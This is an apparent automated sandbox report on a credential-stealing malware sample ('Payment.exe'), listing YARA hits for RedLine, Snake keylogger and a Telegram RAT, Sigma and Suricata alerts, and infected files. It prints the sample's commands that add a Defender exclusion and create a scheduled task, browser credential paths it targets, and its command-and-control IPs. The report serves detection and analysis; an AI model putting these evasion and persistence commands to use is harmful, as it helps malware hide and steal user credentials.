0.2.Payment.exe.3f7a328.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x19d0a0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x19d720:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
39.2.jwBqGZseW.exe.5d10000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.2.jwBqGZseW.exe.5d10000.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
39.2.jwBqGZseW.exe.5d10000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.2.jwBqGZseW.exe.5d10000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x354b8:$a1: get_encryptedPassword 0x3548c:$a2: get_encryptedUsername 0x35550:$a3: get_timePasswordChanged 0x35468:$a4: get_passwordField 0x354ce:$a5: set_encryptedPassword 0x3529b:$a7: get_logins 0x30b76:$a10: KeyLoggerEventArgs 0x30b45:$a11: KeyLoggerEventArgsEventHandler 0x3536f:$a13: _encryptedPassword
39.2.jwBqGZseW.exe.5d10000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f249:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e8ec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eb49:$a4: \Orbitum\User Data\Default\Login Data 0x3f528:$a5: \Kometa\User Data\Default\Login Data
39.2.jwBqGZseW.exe.5d10000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33008:$s1: UnHook 0x32fa4:$s2: SetHook 0x32fdd:$s3: CallNextHook 0x32f6c:$s4: _hook
8.2.Payment.exe.3c40000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.Payment.exe.3c40000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.Payment.exe.3c40000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.Payment.exe.3c40000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x345d8:$a1: get_encryptedPassword 0x345ac:$a2: get_encryptedUsername 0x34670:$a3: get_timePasswordChanged 0x34588:$a4: get_passwordField 0x345ee:$a5: set_encryptedPassword 0x343bb:$a7: get_logins 0x2fc96:$a10: KeyLoggerEventArgs 0x2fc65:$a11: KeyLoggerEventArgsEventHandler 0x3448f:$a13: _encryptedPassword
8.2.Payment.exe.3c40000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e369:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3da0c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3dc69:$a4: \Orbitum\User Data\Default\Login Data 0x3e648:$a5: \Kometa\User Data\Default\Login Data
8.2.Payment.exe.3c40000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32128:$s1: UnHook 0x320c4:$s2: SetHook 0x320fd:$s3: CallNextHook 0x3208c:$s4: _hook
0.2.Payment.exe.411b348.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.Payment.exe.3f7a328.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
39.2.jwBqGZseW.exe.5d10000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
39.2.jwBqGZseW.exe.5d10000.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
39.2.jwBqGZseW.exe.5d10000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
39.2.jwBqGZseW.exe.5d10000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x338b8:$a1: get_encryptedPassword 0x3388c:$a2: get_encryptedUsername 0x33950:$a3: get_timePasswordChanged 0x33868:$a4: get_passwordField 0x338ce:$a5: set_encryptedPassword 0x3369b:$a7: get_logins 0x2ef76:$a10: KeyLoggerEventArgs 0x2ef45:$a11: KeyLoggerEventArgsEventHandler 0x3376f:$a13: _encryptedPassword
39.2.jwBqGZseW.exe.5d10000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d649:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ccec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf49:$a4: \Orbitum\User Data\Default\Login Data 0x3d928:$a5: \Kometa\User Data\Default\Login Data
39.2.jwBqGZseW.exe.5d10000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31408:$s1: UnHook 0x313a4:$s2: SetHook 0x313dd:$s3: CallNextHook 0x3136c:$s4: _hook
8.2.Payment.exe.3c40f20.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.Payment.exe.3c40f20.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.Payment.exe.3c40f20.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.Payment.exe.3c40f20.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x338b8:$a1: get_encryptedPassword 0x3388c:$a2: get_encryptedUsername 0x33950:$a3: get_timePasswordChanged 0x33868:$a4: get_passwordField 0x338ce:$a5: set_encryptedPassword 0x3369b:$a7: get_logins 0x2ef76:$a10: KeyLoggerEventArgs 0x2ef45:$a11: KeyLoggerEventArgsEventHandler 0x3376f:$a13: _encryptedPassword
8.2.Payment.exe.3c40f20.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d649:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ccec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf49:$a4: \Orbitum\User Data\Default\Login Data 0x3d928:$a5: \Kometa\User Data\Default\Login Data
8.2.Payment.exe.3c40f20.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31408:$s1: UnHook 0x313a4:$s2: SetHook 0x313dd:$s3: CallNextHook 0x3136c:$s4: _hook
18.2.jwBqGZseW.exe.44e24c8.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x19d320:$s3: 83 EC 38 53 B0 06 88 44 24 2B 88 44 24 2F B0 D5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
8.2.Payment.exe.3c40f20.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.Payment.exe.3c40f20.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.Payment.exe.3c40f20.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.Payment.exe.3c40f20.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x354b8:$a1: get_encryptedPassword 0x3548c:$a2: get_encryptedUsername 0x35550:$a3: get_timePasswordChanged 0x35468:$a4: get_passwordField 0x354ce:$a5: set_encryptedPassword 0x3529b:$a7: get_logins 0x30b76:$a10: KeyLoggerEventArgs 0x30b45:$a11: KeyLoggerEventArgsEventHandler 0x3536f:$a13: _encryptedPassword
8.2.Payment.exe.3c40f20.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f249:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e8ec:$a3: \Google\Chrome\User Data\Default\Login Data 0x3eb49:$a4: \Orbitum\User Data\Default\Login Data 0x3f528:$a5: \Kometa\User Data\Default\Login Data
8.2.Payment.exe.3c40f20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33008:$s1: UnHook 0x32fa4:$s2: SetHook 0x32fdd:$s3: CallNextHook 0x32f6c:$s4: _hook
Click to see the 62 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", ProcessId: 1264, ProcessName: powershell.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jwBqGZseW.exe, ParentImage: C:\Users\user\AppData\Roaming\jwBqGZseW.exe, ParentProcessId: 7616, ParentProcessName: jwBqGZseW.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp", ProcessId: 7336, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", ProcessId: 1972, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe", ProcessId: 1264, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7952, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment.exe", ParentImage: C:\Users\user\Desktop\Payment.exe, ParentProcessId: 3532, ParentProcessName: Payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp", ProcessId: 1972, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:51.630493+0200	2051649	1	A Network Trojan was detected	192.168.2.8	53205	1.1.1.1	53	UDP
2025-04-10T18:09:54.326604+0200	2051649	1	A Network Trojan was detected	192.168.2.8	53023	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:50.208723+0200	2051648	1	A Network Trojan was detected	192.168.2.8	53810	1.1.1.1	53	UDP
2025-04-10T18:09:52.805027+0200	2051648	1	A Network Trojan was detected	192.168.2.8	54423	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:48.067906+0200	2018141	1	A Network Trojan was detected	52.11.240.239	80	192.168.2.8	49683	TCP
2025-04-10T18:09:50.308934+0200	2018141	1	A Network Trojan was detected	3.229.117.57	80	192.168.2.8	49691	TCP
2025-04-10T18:09:57.422631+0200	2018141	1	A Network Trojan was detected	13.213.51.196	80	192.168.2.8	49709	TCP
2025-04-10T18:11:18.916566+0200	2018141	1	A Network Trojan was detected	54.169.144.97	80	192.168.2.8	49758	TCP
2025-04-10T18:11:25.438430+0200	2018141	1	A Network Trojan was detected	18.142.91.111	80	192.168.2.8	49769	TCP
2025-04-10T18:11:26.910662+0200	2018141	1	A Network Trojan was detected	52.43.119.120	80	192.168.2.8	49774	TCP
2025-04-10T18:11:27.098730+0200	2018141	1	A Network Trojan was detected	54.85.87.184	80	192.168.2.8	49776	TCP
2025-04-10T18:11:28.052827+0200	2018141	1	A Network Trojan was detected	34.245.175.187	80	192.168.2.8	49779	TCP
2025-04-10T18:11:29.234198+0200	2018141	1	A Network Trojan was detected	34.229.166.50	80	192.168.2.8	49782	TCP
2025-04-10T18:11:33.233098+0200	2018141	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.8	49787	TCP
2025-04-10T18:11:46.857725+0200	2018141	1	A Network Trojan was detected	52.212.150.54	80	192.168.2.8	49821	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:48.067906+0200	2037771	1	A Network Trojan was detected	52.11.240.239	80	192.168.2.8	49683	TCP
2025-04-10T18:09:50.308934+0200	2037771	1	A Network Trojan was detected	3.229.117.57	80	192.168.2.8	49691	TCP
2025-04-10T18:09:57.422631+0200	2037771	1	A Network Trojan was detected	13.213.51.196	80	192.168.2.8	49709	TCP
2025-04-10T18:11:18.916566+0200	2037771	1	A Network Trojan was detected	54.169.144.97	80	192.168.2.8	49758	TCP
2025-04-10T18:11:25.438430+0200	2037771	1	A Network Trojan was detected	18.142.91.111	80	192.168.2.8	49769	TCP
2025-04-10T18:11:26.910662+0200	2037771	1	A Network Trojan was detected	52.43.119.120	80	192.168.2.8	49774	TCP
2025-04-10T18:11:27.098730+0200	2037771	1	A Network Trojan was detected	54.85.87.184	80	192.168.2.8	49776	TCP
2025-04-10T18:11:28.052827+0200	2037771	1	A Network Trojan was detected	34.245.175.187	80	192.168.2.8	49779	TCP
2025-04-10T18:11:29.234198+0200	2037771	1	A Network Trojan was detected	34.229.166.50	80	192.168.2.8	49782	TCP
2025-04-10T18:11:33.233098+0200	2037771	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.8	49787	TCP
2025-04-10T18:11:46.857725+0200	2037771	1	A Network Trojan was detected	52.212.150.54	80	192.168.2.8	49821	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:49.468689+0200	2803305	3	Unknown Traffic	192.168.2.8	49686	104.21.64.1	443	TCP
2025-04-10T18:09:51.637581+0200	2803305	3	Unknown Traffic	192.168.2.8	49695	104.21.64.1	443	TCP
2025-04-10T18:09:52.655160+0200	2803305	3	Unknown Traffic	192.168.2.8	49700	104.21.64.1	443	TCP
2025-04-10T18:09:53.785992+0200	2803305	3	Unknown Traffic	192.168.2.8	49705	104.21.64.1	443	TCP
2025-04-10T18:09:54.876682+0200	2803305	3	Unknown Traffic	192.168.2.8	49708	104.21.64.1	443	TCP
2025-04-10T18:09:56.092849+0200	2803305	3	Unknown Traffic	192.168.2.8	49711	104.21.64.1	443	TCP
2025-04-10T18:09:57.149050+0200	2803305	3	Unknown Traffic	192.168.2.8	49716	104.21.64.1	443	TCP
2025-04-10T18:09:58.254728+0200	2803305	3	Unknown Traffic	192.168.2.8	49720	104.21.64.1	443	TCP
2025-04-10T18:10:27.576180+0200	2803305	3	Unknown Traffic	192.168.2.8	49743	104.21.64.1	443	TCP
2025-04-10T18:10:29.748922+0200	2803305	3	Unknown Traffic	192.168.2.8	49748	104.21.64.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:47.858065+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	132.226.8.169	80	TCP
2025-04-10T18:09:49.061166+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	132.226.8.169	80	TCP
2025-04-10T18:09:51.248685+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49689	132.226.8.169	80	TCP
2025-04-10T18:09:52.342438+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49698	132.226.8.169	80	TCP
2025-04-10T18:09:53.451779+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49702	132.226.8.169	80	TCP
2025-04-10T18:09:54.442949+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49707	132.226.8.169	80	TCP
2025-04-10T18:09:55.748824+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49710	132.226.8.169	80	TCP
2025-04-10T18:09:56.748688+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49712	132.226.8.169	80	TCP
2025-04-10T18:09:57.936310+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49717	132.226.8.169	80	TCP
2025-04-10T18:09:59.248699+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49721	132.226.8.169	80	TCP
2025-04-10T18:10:12.565909+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49729	132.226.8.169	80	TCP
2025-04-10T18:10:18.098665+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49731	132.226.8.169	80	TCP
2025-04-10T18:10:23.655014+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49735	132.226.8.169	80	TCP
2025-04-10T18:10:26.248751+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49740	132.226.8.169	80	TCP
2025-04-10T18:10:28.358229+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49745	132.226.8.169	80	TCP
2025-04-10T18:10:29.358136+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49747	132.226.8.169	80	TCP

ETPRO MALWARE VIP Recovery Keylogger Checkin via Telegram (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:59.170255+0200	2860948	1	Malware Command and Control Activity Detected	192.168.2.8	49722	149.154.167.220	443	TCP
2025-04-10T18:10:33.069144+0200	2860948	1	Malware Command and Control Activity Detected	192.168.2.8	49753	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:50.206941+0200	2850851	1	Malware Command and Control Activity Detected	192.168.2.8	49691	3.229.117.57	80	TCP
2025-04-10T18:11:23.482140+0200	2850851	1	Malware Command and Control Activity Detected	192.168.2.8	49765	54.169.144.97	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-10T18:09:59.170255+0200	1810007	1	Potentially Bad Traffic	192.168.2.8	49722	149.154.167.220	443	TCP
2025-04-10T18:10:33.069144+0200	1810007	1	Potentially Bad Traffic	192.168.2.8	49753	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
